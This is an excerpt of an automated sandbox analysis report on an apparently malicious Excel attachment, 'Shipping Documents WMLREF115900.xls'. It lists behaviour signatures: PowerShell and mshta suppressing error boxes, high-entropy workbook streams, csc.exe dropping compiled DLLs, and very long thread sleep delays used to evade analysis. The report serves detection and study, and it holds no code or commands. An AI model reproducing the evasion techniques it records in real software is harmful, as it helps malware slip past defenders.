        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: Shipping Documents WMLREF115900.xlsStream path 'Workbook' entropy: 7.97401795979 (max. 8.0)
        Source: A4230000.0.drStream path 'Workbook' entropy: 7.97449753124 (max. 8.0)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4747Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1428Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4965Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2270Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1599Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 851Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1095Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8686Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 599
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1605
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1500
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 572
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 600
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 989
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1667
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8156
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\41k31je4\41k31je4.dllJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sblybu2m\sblybu2m.dllJump to dropped file
        Source: C:\Windows\System32\mshta.exe TID: 3504Thread sleep time: -60000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3672Thread sleep time: -120000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3768Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3640Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3708Thread sleep count: 4965 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3708Thread sleep count: 2270 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3744Thread sleep time: -120000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3748Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3688Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3960Thread sleep count: 1599 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3960Thread sleep count: 851 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3996Thread sleep time: -60000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4036Thread sleep count: 1095 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4036Thread sleep count: 8686 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4072Thread sleep time: -60000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4076Thread sleep time: -16602069666338586s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4076Thread sleep time: -1200000s >= -30000sJump to behavior
        Source: C:\Windows\System32\mshta.exe TID: 3044Thread sleep time: -420000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2968Thread sleep count: 599 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2968Thread sleep count: 1605 > 30
